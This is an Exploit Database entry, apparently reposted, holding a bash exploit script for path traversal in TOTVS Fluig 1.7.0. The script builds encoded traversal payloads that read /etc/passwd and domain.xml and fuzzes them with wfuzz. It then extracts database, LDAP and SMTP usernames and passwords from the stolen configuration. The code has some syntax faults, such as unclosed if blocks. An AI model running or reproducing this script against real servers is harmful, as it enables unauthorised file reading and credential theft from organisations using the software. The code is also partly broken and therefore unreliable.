Fluig 1.7.0 – Path Traversal

Exploit Database
104 阅读

作者： Lucas Souza

日期： 2021-03-05
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/49622/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

# Exploit Title: Fluig 1.7.0 - Path Traversal

# Date: 26/11/2020

# Exploit Author: Lucas Souza

# Vendor Homepage: https://www.totvs.com/fluig/

# Version: <== 1.7.0-210217

# Tested on: 1.7.0-201124

#!/bin/bash

url="$1"

npayload=$2

> payload.txt

curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner

# -- FUNCTIONS --

function create-payload {

> wordlist.txt

count=1

while [[ $count -le $npayload ]]; do

# WINDOWS PAYLOAD

echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt

echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt

# LINUX PAYLOAD

echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt

echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt

count=$[$count + 1]

done

}

function manual-mode {

while :; do

echo

echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"

echo

echo -e "\033[0;32m -[ clear- Clear Screen\033[0m"

echo -e "\033[0;32m -[ target - Set a target\033[0m"

echo -e "\033[0;32m -[ director/file- Ex: /etc/passwd\033[0m"

echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"

echo

echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2

path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')

mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')

if [[ $path == 'info' ]]; then

clear

cat banner

domain-xml

elif [[ $path == 'clear' ]]; then

clear

elif [[ $path == 'target' ]]; then

XmlPayload=''

echo

echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url

echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload

enum

else

echo

echo "$param../../../../../../../../../../../../..$path" > wordlist.txt

wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt

DirPath=$(head -1 payload.txt)

if [[ $DirPath== '' ]]; then

echo

echo -e '\033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'

else

curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile

echo

echo -e '\033[0;31m'$path'\033[0m'

echo

cat report/$mdr/$mkfile

echo

pwd=$(pwd)

echo

echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'

done

}

function domain-xml {

domain=$(ls report/$mdr | grep domain.xml)

if [[ $domain == '' ]]; then

echo

echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'

else

echo

echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'

echo

echo -e '\033[0;33m[!] INFORMATION\033[0m'

echo

curl -s -I $url | grep Server

echo

echo -e '\033[0;31mTarget\033[0m'

echo $url

echo

echo -e '\033[0;31mPayload plaintext\033[0m'

echo $XmlPayload | base64 -d

echo

echo -e '\033[0;31mPayload base64 encoded\033[0m'

echo $XmlPayload

echo

echo -e '\033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'

echo

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'

echo

echo -e '\033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'

echo

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'

echo

echo -e '\033[0;31m[!] LDAP INTEGRATIONS\033[0m'

echo

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'

echo

echo -e '\033[0;31m[!] SMTP SETTINGS\033[0m'

echo

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'

cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'

echo

manual-mode

}

function enum {

mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')

mkdir -p report/$mdr

if [[ $url == '' ]]; then

clear

cat banner

echo -e ' \033[0;31m-[Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'

echo -e ' \033[0;31m-[Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'

echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'

manual-mode

elif [[ $npayload == '' ]]; then

npayload=25

clear

cat banner

echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'

echo

echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'

echo

create-payload

else

clear

cat banner

echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'

echo

echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'

create-payload

echo

echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'

echo

wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt

payload=$(head -1 payload.txt)

if [[ $payload == '' ]]; then

clear

cat banner

echo -e '\033[0;32m | TOTVS FLUIG -PATH ENUMERATION AND XML ANALISYS \033[0m'

echo

echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'

echo

manual-mode

else

param=$(echo $payload | base64 -d |cut -d '.' -f1)

clear

cat banner

echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'

echo

echo -e '\033[0;33m[!] VULNERABLE\033[0m'

echo

echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'

echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt

echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt

wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt

clear

cat banner

echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'

echo

echo -e '\033[0;33m[!] VULNERABLE\033[0m'

echo

curl -s -I $url | grep Server

echo

echo -e '\033[0;31mTarget\033[0m'

echo $url

echo

echo -e '\033[0;31mPayload plaintext\033[0m'

echo $payload | base64 -d

echo

echo -e '\033[0;31mPayload base64 encoded\033[0m'

echo $payload

echo

XmlPayload=$(head -1 payload.txt)

if [[ $XmlPayload == '' ]]; then

echo

echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'

manual-mode

else

curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml

echo

echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'

manual-mode

}

enum